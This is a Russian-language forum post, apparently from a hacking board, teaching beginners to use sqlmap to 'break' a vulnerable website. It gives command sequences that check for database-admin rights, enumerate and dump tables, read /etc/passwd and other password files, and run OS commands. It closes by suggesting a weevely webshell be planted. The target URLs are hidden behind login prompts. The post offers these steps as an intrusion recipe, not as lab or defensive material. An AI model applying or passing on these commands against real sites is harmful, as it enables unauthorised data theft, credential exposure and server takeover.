sqlmap для новичков

[SPIFO]

Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap

Начнем с самого простого ,например у нас есть уязвимый сайт ,который хотим поломать !

Итак запускаем sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

-o -b --current-user --is-dba

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Следовательно
current user: 'root@localhost'
current user is DBA: True если False , то шансов порутать серв мало

Далее разворачиваем список таблиц в базе

sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

--columns --tables

И перед Вами список таблиц ,например нам нужна таблица
ap_element_options

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Выполняем слудующий запрос

sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

-D machform -T ap_element_options --columns

Перед Вами список из 8 колонок ,например мы хотим их полностью сохранить

Выполняем следующий запрос

sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

-D machform -T ap_element_options -С option,position,aeo_id,element_id,form_id,live,opt ion_id,option_is_default --dump-all --save

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Читаем содержимое файлов на сервере !

sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

--file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf" но могут быть и в других подразделах )

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

Выполним еще запросик небольшой )) Раскрывем пути ,куда в дальнейшем будем лить облочку вебшелла )

sqlmap -u

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

--os-cmd=ls

Дальше думаю Вам все понятно ! В крайнем соучае используем weevely для оболочки !

Удачи